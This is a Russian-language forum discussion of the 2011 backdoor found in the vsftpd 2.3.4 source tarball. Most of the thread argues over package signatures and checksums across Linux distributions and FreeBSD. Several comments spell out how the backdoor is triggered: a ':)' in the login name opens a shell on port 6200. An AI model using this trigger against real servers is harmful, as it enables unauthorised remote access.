The OpenNET Project / Index page

[ новости /+++ | форум | теги | ]

форумы  помощь  поиск  регистрация  майллист  вход/выход  слежка  RSS
"В исходных текстах FTP-сервера vsftpd обнаружен бэкдор"
Вариант для распечатки  
Пред. тема | След. тема 
Форум Разговоры, обсуждение новостей
Изначальное сообщение [ Отслеживать ]

"В исходных текстах FTP-сервера vsftpd обнаружен бэкдор"  +/
Сообщение от opennews on 04-Июл-11, 15:30 
Крис Эванс (Chris Evans), автор популярного FTP-сервера vsftpd (https://security.appspot.com/vsftpd.html) опубликовал уведомление (http://scarybeastsecurity.blogspot.com/2011/07/alert-vsftpd-...) об обнаружении вредоносного кода в исходных текстах vsftpd-2.3.4.tar.gz, распространяемых с первичного сервера проекта. После инцидента сайт проекта был перемещен со старого хостинга в инфраструктуру Google App Engine.

Внедренный в архив vsftpd-2.3.4.tar.gz вредоносный код представляет собой классический бэкдор, запускающий shell при наличии в имени пользователя смайлика ":)". Код бэкдора (http://pastebin.com/AetT9sS5) не был запутан и легко поддается анализу (изменения составляют около десятка строк). Удивление вызывают непродуманные действия совершивших атаку, которые не предусмотрели в бэкдоре механизма для отправки уведомления о возможности проникновения. Непонятно, как злоумышленники пытались выявить пораженные бэкдором хосты. Средства оповещения и запутывание к...

URL: http://scarybeastsecurity.blogspot.com/2011/07/alert-vsftpd-...
Новость: http://www.opennet.dev/opennews/art.shtml?num=31082

Ответить | Правка | Cообщить модератору

Оглавление

Сообщения по теме [Сортировка по времени | RSS]


1. "В исходных текстах FTP-сервера vsftpd обнаружен бэкдор"  +10 +/
Сообщение от indig0z email on 04-Июл-11, 15:30 
Very, Very Secure FTP =)
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

87. "В исходных текстах FTP-сервера vsftpd обнаружен бэкдор"  +5 +/
Сообщение от Аноним123321 (ok) on 05-Июл-11, 03:44 
"gpg: BAD signature..." -- какбы намекает нам на то что чам vsftp не поражён

малоли кто там мог что подменить на download-серверах.... ды даже ваш провайдер может подменить вам некоторые сервера

Ответить | Правка | ^ к родителю #1 | Наверх | Cообщить модератору

4. "В исходных текстах FTP-сервера vsftpd обнаружен бэкдор"  –15 +/
Сообщение от Аноним (??) on 04-Июл-11, 15:37 
EPIC FAIL
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

86. "В исходных текстах FTP-сервера vsftpd обнаружен бэкдор"  +3 +/
Сообщение от solardiz (ok) on 05-Июл-11, 03:41 
А по-моему это отличный пример того, что подписи (GPG detached signatures) на upstream tarball'ах работают, по крайней мере иногда. И еще это пример того, что Крис подготовился к этой возможной проблеме заранее, подписывая релизы. Если риск был известен и по нему были приняты должные меры - то какой же это fail? Не все должные меры? Возможно. Но один из уровней безопасности сработал-таки.

Думаю, не найдется ни одного дистрибутива, включающего этот бекдор. Многие проверяют подписи, а бекдор существовал на сайте очень недолго. К сожалению, нет информации о том сколько именно; мое предположение - 1-3 дня. Подпись помогла и здесь.

В Owl, при обновлении на версию 2.3.4 (уже достаточно давно) мы подпись проверяли, а также конкретно для vsftpd я бегло просматриваю diff'ы между версиями - они достаточно маленькие - и я делал это и конкретно для 2.3.4 (относительно 2.3.2). Такую явную вещь я бы заметил. (Более хитрую мог бы и упустить, да.) Это для тех, кто говорит что Open Source не помогает от бекдоров т.к. исходники никто не читает. В этом есть доля истины, но не вся истина.

Ответить | Правка | ^ к родителю #4 | Наверх | Cообщить модератору

88. "В исходных текстах FTP-сервера vsftpd обнаружен бэкдор"  +1 +/
Сообщение от solardiz (ok) on 05-Июл-11, 08:48 
> мое предположение - 1-3 дня.

По анализу архива, возможно до 3-4 дней: http://www.openwall.com/lists/oss-security/2011/07/05/6

Ответить | Правка | ^ к родителю #86 | Наверх | Cообщить модератору

100. "В исходных текстах FTP-сервера vsftpd обнаружен бэкдор"  +/
Сообщение от anonymous (??) on 05-Июл-11, 14:20 
> EPIC FAIL

да: для всех, кто не проверяет подписи.

Ответить | Правка | ^ к родителю #4 | Наверх | Cообщить модератору

7. "В исходных текстах FTP-сервера vsftpd обнаружен бэкдор"  +4 +/
Сообщение от Denisiuk email(ok) on 04-Июл-11, 15:46 
в конце окажется, что взломали FTP хостинга, а FTP сервер там был не VS. и разработчики: НУ! О ЧЕМ МЫ  ГОВОРИЛИ??!!!
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

11. "В исходных текстах FTP-сервера vsftpd обнаружен бэкдор"  –1 +/
Сообщение от Аноним (??) on 04-Июл-11, 16:07 
Это такая скрытая реклама: "Не будет нас, будет как снами!" ))
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

12. "В исходных текстах FTP-сервера vsftpd обнаружен бэкдор"  +1 +/
Сообщение от Аноним (??) on 04-Июл-11, 16:09 
Жаль, для таких проектов нужно иметь собственный сервер в стойке ДЦ или надежный хостинг от крупных компаний. А не винить потом хостинг.
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

15. "В исходных текстах FTP-сервера vsftpd обнаружен бэкдор"  +1 +/
Сообщение от PavelR (??) on 04-Июл-11, 16:25 
Ты много спонсорской помощи проекту оказал?
Там кнопка PayPal (было бы желание) слева на сайте есть...
Ответить | Правка | ^ к родителю #12 | Наверх | Cообщить модератору

17. "В исходных текстах FTP-сервера vsftpd обнаружен бэкдор"  –9 +/
Сообщение от Джон on 04-Июл-11, 16:31 
Нда. При том что оригинальные подписи остальсь нетронутыми и получив пакет сорцов можно легко проверить что чексуммы не совпадают... Линукс такой линукс... Толи дело freebsd - оно даже не подумает ставить софт, если md5 и sha сорцов не будут оригинальными, которые автор порта вписал в порт в день его создания.
Ответить | Правка | ^ к родителю #12 | Наверх | Cообщить модератору

18. "В исходных текстах FTP-сервера vsftpd обнаружен бэкдор"  +5 +/
Сообщение от koblin (ok) on 04-Июл-11, 16:36 
vsftpd имеет такое же отношение к Linux как и к FreeBSD..
Ответить | Правка | ^ к родителю #17 | Наверх | Cообщить модератору

19. "В исходных текстах FTP-сервера vsftpd обнаружен бэкдор"  –8 +/
Сообщение от nikll email(ok) on 04-Июл-11, 16:46 
Суть не в оси, а в подходе. Фря чуть более "параноидальна"или "продуманна" (кому как нравится) в этом плане.
Ответить | Правка | ^ к родителю #18 | Наверх | Cообщить модератору

21. "В исходных текстах FTP-сервера vsftpd обнаружен бэкдор"  +3 +/
Сообщение от koblin (ok) on 04-Июл-11, 16:49 
> Суть не в оси, а в подходе. Фря чуть более "параноидальна"или "продуманна"
> (кому как нравится) в этом плане.

Во-первых, в любом линуксовом дистрибутиве есть проверка подписей пакетов. Во-вторых, тут речь идет о распространении исходников программы безотносительно какого-либо дистрибутива или платфоры.

Ответить | Правка | ^ к родителю #19 | Наверх | Cообщить модератору

22. "В исходных текстах FTP-сервера vsftpd обнаружен бэкдор"  –5 +/
Сообщение от Миксер on 04-Июл-11, 16:50 
> Суть не в оси, а в подходе. Фря чуть более "параноидальна"или "продуманна"
> (кому как нравится) в этом плане.

Плюсую. Дистриб, где софт ставится из сорцов. Вот это тру.

Ответить | Правка | ^ к родителю #19 | Наверх | Cообщить модератору

33. "В исходных текстах FTP-сервера vsftpd обнаружен бэкдор"  +/
Сообщение от Аноним (??) on 04-Июл-11, 18:09 
При чём тут исходники, ты их каждый раз на бэкдоры проверяешь перед установкой, что ли? Речь о том, что проверка контрольной суммы (не важно чего, исходников или бинарников) — штука полезная.
Ответить | Правка | ^ к родителю #22 | Наверх | Cообщить модератору

63. "В исходных текстах FTP-сервера vsftpd обнаружен бэкдор"  +1 +/
Сообщение от Аноним (??) on 04-Июл-11, 23:57 
> Плюсую. Дистриб, где софт ставится из сорцов. Вот это тру.

И много трушные перцы сорцев перечитали? И как, в вашем, трушном - версия с сплойтом или без? Вы хотя-бы знаете это? :)

Ответить | Правка | ^ к родителю #22 | Наверх | Cообщить модератору

95. "В исходных текстах FTP-сервера vsftpd обнаружен бэкдор"  +1 +/
Сообщение от Mike Lee on 05-Июл-11, 12:17 
ну я в gentoo проверил сорцы сразу же. ибо пользую vsftpd на продакшене. а sha256 и md5 само проверяется так же как и в хваленой бзде.
Ответить | Правка | ^ к родителю #63 | Наверх | Cообщить модератору

105. "В исходных текстах FTP-сервера vsftpd обнаружен бэкдор"  +1 +/
Сообщение от Michael Shigorin email(ok) on 05-Июл-11, 20:21 
> Плюсую. Дистриб, где софт ставится из сорцов. Вот это тру.

Ребят, тут рядом про openssh в "последней серверной фре".  Почитайте, а потом продолжайте говорить штампами... если захочется.

Ответить | Правка | ^ к родителю #22 | Наверх | Cообщить модератору

109. "В исходных текстах FTP-сервера vsftpd обнаружен бэкдор"  –1 +/
Сообщение от universite email(ok) on 05-Июл-11, 23:21 
Толсто.
Была устаревшая, пятилетней давности, 4-тая ветка.
Ответить | Правка | ^ к родителю #105 | Наверх | Cообщить модератору

110. "В исходных текстах FTP-сервера vsftpd обнаружен бэкдор"  –1 +/
Сообщение от Аноним (??) on 06-Июл-11, 00:18 
> Толсто.

У бздельников всегда так. Попробуйте тоньше.

> Была устаревшая, пятилетней давности, 4-тая ветка.

Факта наличия дыры это не отменяет; более того, факт отсутствия этой дыры в более новых версиях не был анонсирован. И если учесть что сложность freebsd 8 существенно выше - можно ожидать что багов в ней еще больше. Не боитесь что однажды будет мучительно стыдно за распостранение дезы? А то местные параноики как-то невысокого мнения о секурити фичах фри, а гента и вовсе облажалась с раздачей пробэкдореного софта.

Ответить | Правка | ^ к родителю #109 | Наверх | Cообщить модератору

114. "В исходных текстах FTP-сервера vsftpd обнаружен бэкдор"  +/
Сообщение от universite email(ok) on 06-Июл-11, 00:44 
>> Толсто.
> У бздельников всегда так. Попробуйте тоньше.
>> Была устаревшая, пятилетней давности, 4-тая ветка.
> Факта наличия дыры это не отменяет; более того, факт отсутствия этой дыры
> в более новых версиях не был анонсирован.

То бишь не найден. :)
Как найдете - опубликуйте свои исследования

> И если учесть что
> сложность freebsd 8 существенно выше - можно ожидать что багов в
> ней еще больше. Не боитесь что однажды будет мучительно стыдно за
> распостранение дезы? А то местные параноики как-то невысокого мнения о секурити
> фичах фри, а гента и вовсе облажалась с раздачей пробэкдореного софта.

Баги есть везде, но некоторые не хотят их замечать. А некоторые не могут обновиться.
Тут есть полно любителей Линукса, которые любят патчить ядро.
Через полгода вы сможете вспомнить, откуда вы брали патчи?
Сможете их накатить на новую версию ядра?


Ответить | Правка | ^ к родителю #110 | Наверх | Cообщить модератору

126. "В исходных текстах FTP-сервера vsftpd обнаружен бэкдор"  –1 +/
Сообщение от anonymous (??) on 06-Июл-11, 09:40 
> Тут есть полно любителей Линукса, которые любят патчить ядро.
> Через полгода вы сможете вспомнить, откуда вы брали патчи?
> Сможете их накатить на новую версию ядра?

а в чём проблема? я не понимаю: у бздюшников, что ли, принято патчить чем попало, даже не сохраняя лог работ, адреса, откуда взяли патчи и краткие замечания, зачем тот или иной патч накатили? если так — не надо думать, что остальные привыкли поступать так же.

Ответить | Правка | ^ к родителю #114 | Наверх | Cообщить модератору

138. "В исходных текстах FTP-сервера vsftpd обнаружен бэкдор"  +/
Сообщение от nagual email(ok) on 07-Июл-11, 13:03 
>> Плюсую. Дистриб, где софт ставится из сорцов. Вот это тру.
> Ребят, тут рядом про openssh в "последней серверной фре".  Почитайте, а
> потом продолжайте говорить штампами... если захочется.

Вообщето 4 версия фри как бы не последняя ... хотя для линуксоидов все может быть :-))

Ответить | Правка | ^ к родителю #105 | Наверх | Cообщить модератору

142. "В исходных текстах FTP-сервера vsftpd обнаружен бэкдор"  +/
Сообщение от Michael Shigorin email(ok) on 07-Июл-11, 14:26 
Я-то знаю, потому и цитата в кавычки забрана. :)

Просто "труъ" -- это не характеристика, а эмоции.  Что-то из жаргона техноблондинов, переобщавшихся с Эллочкой-людоедкой.

Ответить | Правка | ^ к родителю #138 | Наверх | Cообщить модератору

31. "В исходных текстах FTP-сервера vsftpd обнаружен бэкдор"  +2 +/
Сообщение от Аноним (??) on 04-Июл-11, 17:58 
> Суть не в оси, а в подходе. Фря чуть более "параноидальна"или "продуманна"
> (кому как нравится) в этом плане.

По современным меркам - уже нет, как тут справедливо заметили, контрольные суммы считаются только при явном указании от мейнтейнера. В отличие от более продуманного линукса, в котором нужно сильно попотеть, чтобы отключить чексуммы :-)

Ответить | Правка | ^ к родителю #19 | Наверх | Cообщить модератору

43. "В исходных текстах FTP-сервера vsftpd обнаружен бэкдор"  +/
Сообщение от жопка3 on 04-Июл-11, 21:50 
Не думаю что порт-коммитеры примут PR оформленный без make makesum. portlint сразу же за это скушает
Ответить | Правка | ^ к родителю #31 | Наверх | Cообщить модератору

90. "В исходных текстах FTP-сервера vsftpd обнаружен бэкдор"  –1 +/
Сообщение от nikll email(ok) on 05-Июл-11, 10:17 
> Не думаю что порт-коммитеры примут PR оформленный без make makesum. portlint сразу
> же за это скушает

+1 еще ни разу не встречал порты без чексумм, причем там сразу три проверки идет md5 sha256 и размер в байтах, левый архив сорцов не пройдет, фря просто начнет ругатся и откажется ставить этот порт (хотя при желании можно снести файл distinfo и поставить с левого архива, если сииильно хочется то можно и в ногу выстрелить)

центос просто выводит сообщение о несответствиях чексуммы (среди прочего вывода) и устанавливает (yum -y т.к. палец давить на [y] устанет пока на каждый глупый вопрос ответишь)

Ответить | Правка | ^ к родителю #43 | Наверх | Cообщить модератору

99. "В исходных текстах FTP-сервера vsftpd обнаружен бэкдор"  +1 +/
Сообщение от Аноним (??) on 05-Июл-11, 13:42 
> (yum -y т.к. палец давить на [y] устанет пока на каждый
> глупый вопрос ответишь)

О, нормально так. А если вам ногу сломать - я тогда наверняка порву вас на стометровке! Правда это будет не совсем честное соревнование ;)

Ответить | Правка | ^ к родителю #90 | Наверх | Cообщить модератору

102. "В исходных текстах FTP-сервера vsftpd обнаружен бэкдор"  +/
Сообщение от anonymous (??) on 05-Июл-11, 14:24 
> md5 sha256 и размер в байтах

а нормальным людям достаточно gpg…

Ответить | Правка | ^ к родителю #90 | Наверх | Cообщить модератору

111. "В исходных текстах FTP-сервера vsftpd обнаружен бэкдор"  +/
Сообщение от Аноним (??) on 06-Июл-11, 00:20 
>> md5 sha256 и размер в байтах
> а нормальным людям достаточно gpg…

Более того, пересчитать контрольные суммы - элементарно. А вот подогнать цифровую подпись без изменения ключа и не обладая приватной половиной ключа - проблематично, знаете ли.

Ответить | Правка | ^ к родителю #102 | Наверх | Cообщить модератору

136. "В исходных текстах FTP-сервера vsftpd обнаружен бэкдор"  +/
Сообщение от Аноним (??) on 06-Июл-11, 21:11 
> В отличие от более продуманного линукса, в котором нужно сильно попотеть, чтобы отключить чексуммы :-)

Для ССЗБ в генте есть FEATURES="digest"

Ответить | Правка | ^ к родителю #31 | Наверх | Cообщить модератору

52. "В исходных текстах FTP-сервера vsftpd обнаружен бэкдор"  +1 +/
Сообщение от Клыкастый (ok) on 04-Июл-11, 22:29 
при установке из портежей также проверяются чексуммы. проблема не в линуксе. проблема в механизме установки софта. далее вопрос: а если бы взломщики поправили чексуммы?
Ответить | Правка | ^ к родителю #19 | Наверх | Cообщить модератору

20. "В исходных текстах FTP-сервера vsftpd обнаружен бэкдор"  –3 +/
Сообщение от Лоловой on 04-Июл-11, 16:48 
> vsftpd имеет такое же отношение к Linux как и к FreeBSD..

Да, это так. Но все они, безусловно, имеют отношение к опенсорцу, о котором и речь. И если на фряхе есть защита от такого косяка, то, как удалось выяснить, на fedora 13 нету - там запросто системный инсталер проинсталил софт из пакета с явно битыми чексуммами. Вот вам и лол.

Ответить | Правка | ^ к родителю #18 | Наверх | Cообщить модератору

24. "В исходных текстах FTP-сервера vsftpd обнаружен бэкдор"  +/
Сообщение от koblin (ok) on 04-Июл-11, 16:52 
Много где, помимо фряхи, есть такая защита. Непонятно с какой целю ее вытащили из чулана в этом топике.
Ответить | Правка | ^ к родителю #20 | Наверх | Cообщить модератору

32. "В исходных текстах FTP-сервера vsftpd обнаружен бэкдор"  +3 +/
Сообщение от szh (ok) on 04-Июл-11, 18:01 
это жалкие потуги поговорить о freebsd vs linux. Фан бой не знает про подписи в rpm и в deb.
Ответить | Правка | ^ к родителю #24 | Наверх | Cообщить модератору

79. "В исходных текстах FTP-сервера vsftpd обнаружен бэкдор"  +/
Сообщение от Аноним (??) on 05-Июл-11, 01:12 
> это жалкие потуги поговорить о freebsd vs linux. Фан бой не знает
> про подписи в rpm и в deb.

А потом они еще удивляются когда окружающие считают что бред про freebsd однозначно детектирует школоло.

Ответить | Правка | ^ к родителю #32 | Наверх | Cообщить модератору

26. "В исходных текстах FTP-сервера vsftpd обнаружен бэкдор"  +1 +/
Сообщение от Alen (??) on 04-Июл-11, 17:04 
Я не знаю про федору, но на ней точно свет клином не сошелся! Попробуй в генте что ни будь установить с различающимися контрольными суммами исходников ибилдов патчей, да хоть файла с инфрмацией о пакете :)
Ответить | Правка | ^ к родителю #20 | Наверх | Cообщить модератору

39. "В исходных текстах FTP-сервера vsftpd обнаружен бэкдор"  +/
Сообщение от коксюзер on 04-Июл-11, 19:59 
> Я не знаю про федору, но на ней точно свет клином не
> сошелся! Попробуй в генте что ни будь установить с различающимися контрольными
> суммами исходников ибилдов патчей, да хоть файла с инфрмацией о пакете
> :)

В генте исходники не подписываются (либо немногочисленные подписи не проверяются автоматически), как и все другие файлы дерева. Если взломщик получил доступ к ебилдам, он и дайджест поправит. Более того, для модификации файлов eclass'ов не нужно даже дайджест менять, поскольку он для eclass'ов не считается. Вот вам и гента. Единственный, сколько-нибудь надёжный способ удостоверить целостность и аутентичность файлов дерева portage - получаеть его снэпшотами через emerge-webrsync с включённой и настроенной фичей webrsync-gpg.

-- Пользователь Hardened Gentoo

Ответить | Правка | ^ к родителю #26 | Наверх | Cообщить модератору

44. "В исходных текстах FTP-сервера vsftpd обнаружен бэкдор"  +/
Сообщение от вш9 on 04-Июл-11, 21:51 
В debian тоже не обязательно иметь хэши в пакете. Пакет ставится и без нихы
Ответить | Правка | ^ к родителю #39 | Наверх | Cообщить модератору

65. "В исходных текстах FTP-сервера vsftpd обнаружен бэкдор"  +/
Сообщение от Аноним (??) on 05-Июл-11, 00:00 
> В debian тоже не обязательно иметь хэши в пакете. Пакет ставится и без нихы

Там не только хеш, но и полноценная цифровая подпись. Без нее конечно можно поставить, но по дефолту менеджеры пакетов на проблемы подписи верещат от всей души. Так что хаксор будет запален в первые же 10 минут после диверсии.

Ответить | Правка | ^ к родителю #44 | Наверх | Cообщить модератору

45. "В исходных текстах FTP-сервера vsftpd обнаружен бэкдор"  +/
Сообщение от Alen (??) on 04-Июл-11, 21:56 
Где это, уважаемый, я говорил про подписанные исходники?
Я вообще считаю что абсолютной защиты не существует!
Однако в данном случае (внесение изменений в уже выложенную версию)
безопасности генты вполне хватило бы для защиты системы от установки
попатченной версии.
Ответить | Правка | ^ к родителю #39 | Наверх | Cообщить модератору

77. "В исходных текстах FTP-сервера vsftpd обнаружен бэкдор"  +1 +/
Сообщение от Аноним (??) on 05-Июл-11, 01:09 
> безопасности генты вполне хватило бы для защиты системы от установки
> попатченной версии.

Мечтать не вредно - они уже отгружали UnrealIRCD с сплойтом от Acid Bitches. На что их там хватило? Отгрузить забэкдореный сервер? Так и еще раз хватит таким манером.

Ответить | Правка | ^ к родителю #45 | Наверх | Cообщить модератору

75. "В исходных текстах FTP-сервера vsftpd обнаружен бэкдор"  –1 +/
Сообщение от Аноним (??) on 05-Июл-11, 01:07 
> -- Пользователь Hardened Gentoo

paxuser, перелогинься.

Ответить | Правка | ^ к родителю #39 | Наверх | Cообщить модератору

96. "В исходных текстах FTP-сервера vsftpd обнаружен бэкдор"  +2 +/
Сообщение от коксюзер on 05-Июл-11, 13:06 
>> -- Пользователь Hardened Gentoo
> paxuser, перелогинься.

А смысл? И так ясно, что это я. ;)

Ответить | Правка | ^ к родителю #75 | Наверх | Cообщить модератору

119. "В исходных текстах FTP-сервера vsftpd обнаружен бэкдор"  +/
Сообщение от wechat on 06-Июл-11, 02:48 
>-- Пользователь Hardened Gentoo

Спасибо.

Ответить | Правка | ^ к родителю #39 | Наверх | Cообщить модератору

40. "В исходных текстах FTP-сервера vsftpd обнаружен бэкдор"  +/
Сообщение от Анон9 on 04-Июл-11, 20:02 
Имхо, метадата там генерится на основе скачаных сорцов самим мантейнером. Откуда он скачал этот сорец,  если в ебилде стоит mirror, известно только самому мантейнеру.
Ответить | Правка | ^ к родителю #26 | Наверх | Cообщить модератору

78. "В исходных текстах FTP-сервера vsftpd обнаружен бэкдор"  +/
Сообщение от Аноним (??) on 05-Июл-11, 01:11 
> самому мантейнеру.

Примеры того к чему это ведет - тут: http://www.opennet.dev/opennews/art.shtml?num=26945

Ответить | Правка | ^ к родителю #40 | Наверх | Cообщить модератору

28. "В исходных текстах FTP-сервера vsftpd обнаружен бэкдор"  +/
Сообщение от t (??) on 04-Июл-11, 17:24 
md5 уже не проверяется, и контрольные суммы не создаются.
если только мейнтейнер порта явно не перечислит asc-файлы в distinfo.
Ответить | Правка | ^ к родителю #17 | Наверх | Cообщить модератору

29. "В исходных текстах FTP-сервера vsftpd обнаружен бэкдор"  +1 +/
Сообщение от Аноним (??) on 04-Июл-11, 17:56 
> При том что оригинальные подписи остальсь нетронутыми и получив пакет сорцов
> можно легко проверить что чексуммы не совпадают... Линукс такой линукс... Толи
> дело freebsd - оно даже не подумает ставить софт, если md5
> и sha сорцов не будут оригинальными, которые автор порта вписал в
> порт в день его создания.

Фанатики фрибсд такие фанатики... О линуксе знают только понаслышке, да.
FYI: в любом нормальном линуксовом дистре для всех пакетов считаются хеши, которые, в свою очередь, подписываются ключами репозитария. Пакетный менеджер (например, rpm), без указания кучи параметров типа (--force --nomd5 --nodigest --nosignature), никогда не поставит битый пакет.

Ответить | Правка | ^ к родителю #17 | Наверх | Cообщить модератору

34. "В исходных текстах FTP-сервера vsftpd обнаружен бэкдор"  –3 +/
Сообщение от Отсутствуют данные в поле Name on 04-Июл-11, 18:25 
Как говорится, не холиавра ради, а для поинтересоваться лишь. Считаете ли вы, что rpm лучше, чем  deb?
Ответить | Правка | ^ к родителю #29 | Наверх | Cообщить модератору

73. "В исходных текстах FTP-сервера vsftpd обнаружен бэкдор"  +1 +/
Сообщение от Аноним (??) on 05-Июл-11, 01:02 
> Как говорится, не холиавра ради, а для поинтересоваться лишь. Считаете ли вы,
> что rpm лучше, чем  deb?

В указанном случае они однофигственны: оба проверяют чексуммы и подписи.

Ответить | Правка | ^ к родителю #34 | Наверх | Cообщить модератору

120. "В исходных текстах FTP-сервера vsftpd обнаружен бэкдор"  +/
Сообщение от wechat on 06-Июл-11, 02:51 
>Как говорится, не холиавра ради, а для поинтересоваться лишь. Считаете ли вы, что rpm лучше, чем  deb?

Нет.

Ответить | Правка | ^ к родителю #34 | Наверх | Cообщить модератору

42. "В исходных текстах FTP-сервера vsftpd обнаружен бэкдор"  +/
Сообщение от nagual email(ok) on 04-Июл-11, 20:24 
Так все таки как оно в бинари пролезло ? и как давно ?
Ответить | Правка | ^ к родителю #29 | Наверх | Cообщить модератору

64. "В исходных текстах FTP-сервера vsftpd обнаружен бэкдор"  +/
Сообщение от Аноним (??) on 04-Июл-11, 23:57 
> Так все таки как оно в бинари пролезло ? и как давно ?

Где Вы нашли "бинари"? В новости речь идёт о пакете с _исходным кодом_ для которого даже чексумма не сошлась.

Ответить | Правка | ^ к родителю #42 | Наверх | Cообщить модератору

35. "В исходных текстах FTP-сервера vsftpd обнаружен бэкдор"  +/
Сообщение от анонимомус on 04-Июл-11, 18:26 
Сгенерить md5 и sha - легко, потом откуда берутся эти хеши, с сайта, который взломали, или со скаченного файла с того же самого сайта? Хеши в основном для проверки, что файл не изменился/не сломался по дороге.

В арче в pkgbuild'ах тоже прописаны md5, когда хочется собрать пакет с новой версией, обычно скачиваются новые исходники и генерятся хеши.

Другое дело цифровая подпись, ее без приватного ключа не сгенерить.

Ответить | Правка | ^ к родителю #17 | Наверх | Cообщить модератору

50. "В исходных текстах FTP-сервера vsftpd обнаружен бэкдор"  +/
Сообщение от Eugene.Shiyanov on 04-Июл-11, 22:20 
Попробуйте в Gentoo Linux подменить сорцы. Увидите что получится.
Ответить | Правка | ^ к родителю #17 | Наверх | Cообщить модератору

51. "В исходных текстах FTP-сервера vsftpd обнаружен бэкдор"  +/
Сообщение от Eugene.Shiyanov on 04-Июл-11, 22:24 
Что-то я стормозил :) выше об этом уже сказали :)
Ответить | Правка | ^ к родителю #50 | Наверх | Cообщить модератору

72. "В исходных текстах FTP-сервера vsftpd обнаружен бэкдор"  +/
Сообщение от Аноним (??) on 05-Июл-11, 00:59 
> Попробуйте в Gentoo Linux подменить сорцы. Увидите что получится.

Мы уже увидели как гентусятники раздали Unreal IRCD. С бэкдором от AcidBitches. Не вижу что помешает тамошним майнтайнерам повторить подвиг для чуточку более популярного vsftpd.

Ответить | Правка | ^ к родителю #50 | Наверх | Cообщить модератору

121. "В исходных текстах FTP-сервера vsftpd обнаружен бэкдор"  +/
Сообщение от wechat on 06-Июл-11, 02:53 
>> Попробуйте в Gentoo Linux подменить сорцы. Увидите что получится.
> Мы уже увидели как гентусятники раздали Unreal IRCD. С бэкдором от AcidBitches.
> Не вижу что помешает тамошним майнтайнерам повторить подвиг для чуточку более
> популярного vsftpd.

Ты хотя бы Gentoo живую в глаза собственную видел?

Ответить | Правка | ^ к родителю #72 | Наверх | Cообщить модератору

25. "В исходных текстах FTP-сервера vsftpd обнаружен бэкдор"  +/
Сообщение от Аноним (??) on 04-Июл-11, 16:55 
запускающий shell на TCP-порту 6200 при наличии в имени пользователя смайлика ":)"
так далеко не в каждом имени пользователя есть смайлик ...
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

27. "В исходных текстах FTP-сервера vsftpd обнаружен бэкдор"  +/
Сообщение от анонимный аноним on 04-Июл-11, 17:09 
Так шелл был вставлен в функцию str_contains_space. Т.е. передаем имя несуществующего пользователя содержащего ":)" и вперед, поднимается бэкдор.
Ответить | Правка | ^ к родителю #25 | Наверх | Cообщить модератору

71. "В исходных текстах FTP-сервера vsftpd обнаружен бэкдор"  +/
Сообщение от Аноним (??) on 05-Июл-11, 00:56 
> так далеко не в каждом имени пользователя есть смайлик ...

Так далеко не каждый пользователь - хаксор :)

Ответить | Правка | ^ к родителю #25 | Наверх | Cообщить модератору

30. "В исходных текстах FTP-сервера vsftpd обнаружен бэкдор"  +2 +/
Сообщение от Имени нету on 04-Июл-11, 17:57 
("gpg: BAD signature..." вместо "gpg: Good signature...")

Спасибо, Кэп.

Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

36. "В исходных текстах FTP-сервера vsftpd обнаружен бэкдор"  +/
Сообщение от Аноним (??) on 04-Июл-11, 19:47 
Странно почему ":)" доступно в именах пользователя. Я думал ':' - это запрещённый символ в UNIX-именах пользователя, т.к. им обычно разделяют имя пользователя от имени группы.
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

38. "В исходных текстах FTP-сервера vsftpd обнаружен бэкдор"  +1 +/
Сообщение от Sylvia (ok) on 04-Июл-11, 19:54 
а пользователь не обязательно должен существовать, в строке ввода должен присутствовать смайлик, этого достаточно ;)
Ответить | Правка | ^ к родителю #36 | Наверх | Cообщить модератору

53. "В исходных текстах FTP-сервера vsftpd обнаружен бэкдор"  +/
Сообщение от Клыкастый (ok) on 04-Июл-11, 22:32 
> Странно почему ":)" доступно в именах пользователя. Я думал ':' - это
> запрещённый символ в UNIX-именах пользователя, т.к. им обычно разделяют имя пользователя
> от имени группы.

Всё логично: легальные пользователи не взведут случайно бэкдорный шелл.

Ответить | Правка | ^ к родителю #36 | Наверх | Cообщить модератору

57. "В исходных текстах FTP-сервера vsftpd обнаружен бэкдор"  –1 +/
Сообщение от yopt email(ok) on 04-Июл-11, 23:23 
> Всё логично: легальные пользователи не взведут случайно бэкдорный шелл.

случайно постучавшись на порт 6200. а так да

Ответить | Правка | ^ к родителю #53 | Наверх | Cообщить модератору

83. "В исходных текстах FTP-сервера vsftpd обнаружен бэкдор"  +/
Сообщение от WhiteWind (ok) on 05-Июл-11, 03:01 
FTP работает на стандартном порту, на 6200 открывается шелл
Ответить | Правка | ^ к родителю #57 | Наверх | Cообщить модератору

37. "В исходных текстах FTP-сервера vsftpd обнаружен бэкдор"  +/
Сообщение от Sylvia (ok) on 04-Июл-11, 19:52 
учитывая то, что бэкдор не претендует на серьезность, это просто демонстрация того, что стоит больше уделять внимания размещению кода в безопасном месте и проверке контрольных сумм и подписей, ну а vsftpd был замечательным выбором еще и потому, что претендует на звание самого защищенного ftp сервера.
Подписывать и проверять по умолчанию нужно всё, а то многие (даже дистрибутивная политика бывает) доверяют просто размещению файлов на зеркале, не беря во внимание то, что зеркало может быть взломано или еще каким либо образом организована подстава с подменой файлов. Год-полгода назад дебиан вспоминали, что можно было с зеркала скармливать старые дырявые пакеты, но проходящие проверку подписи.
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

47. "В исходных текстах FTP-сервера vsftpd обнаружен бэкдор"  +/
Сообщение от Аноним (??) on 04-Июл-11, 22:12 
Обычно те кто сильно много верещит о безопасности, потом за это страдают. Это как красная тряпка для быка. Безопасность всех ресурсов заявлявшего скорее всего досканально проверят. Не пострадал за это разве что D.J. Berstein, который свое дело знал и выплачивал премию только 1 раз :)
Ответить | Правка | ^ к родителю #37 | Наверх | Cообщить модератору

60. "В исходных текстах FTP-сервера vsftpd обнаружен бэкдор"  +/
Сообщение от Аноним (??) on 04-Июл-11, 23:49 
А причём здесь dj? Ошибку же не в исходном коде vsftpd нашли, а в его хостинге.
Ответить | Правка | ^ к родителю #47 | Наверх | Cообщить модератору

70. "В исходных текстах FTP-сервера vsftpd обнаружен бэкдор"  +3 +/
Сообщение от Аноним (??) on 05-Июл-11, 00:55 
